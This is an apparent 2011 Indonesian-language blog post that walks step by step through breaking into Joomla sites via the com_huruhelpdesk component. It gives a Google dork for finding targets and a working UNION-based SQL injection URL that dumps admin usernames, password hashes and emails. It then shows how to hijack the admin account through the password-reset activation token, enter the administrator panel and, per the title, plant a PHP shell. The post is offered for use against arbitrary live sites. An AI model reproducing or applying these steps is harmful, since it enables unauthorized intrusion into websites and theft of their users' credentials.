Friday, September 2, 2011

step by step SQL Injection "joomla"

1:39 AM gilang No comments

********************************************************************************​******
* title : exploit joomla : com_huruhelpdesk + reset password + pasang php shell





==========
[+] step 1
==========

buka google.. ketik keyword
"inurl:/index.php?option=com_huruhelpdesk\"


tes satu per satu
coba kita ambil yang ini


[Image: 1-2.jpg]

==========
[+] step 2
==========

pasang exploit..
==========

/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat(username,0x3a,password,0x3a,email),5,6,7+from+jos_users--

[Image: 2.jpg]
  
 tu admin nya... :P
nampak..


==========
[+] step 3
==========

coba kita reset password nya



/index.php?option=com_user&view=reset
 
[Image: 3.jpg]
 
 enter..



==========
[+] step 4
==========

minta activation pula
hmm.. gimana ne?
tenang.. kita cari dulu activationnya



[Image: 4.jpg]



tu kluar activatifasinya
hehehe
:)
lanjut...

copas aja ke yang tadi.. enter.. :)



==========
[+] step 5
==========

copas aja ke yang tadi.. enter.. :)

[Image: 5.jpg]


:P



==========
[+] step 6
==========

wkwkkw
minta pasword baru tu.. kasih aja..
hehhehe

[Image: 6.jpg]


 
==========
[+] step 7
==========

OK langsung aja masuk ke admin nya..
:)

http://[site]/[pacth]/administrator


[Image: 7.jpg]






silakan kreasikan sendiri :)

0 comments :

Post a Comment

 
Design by blogger templates | powered by cbfteam official | zone-h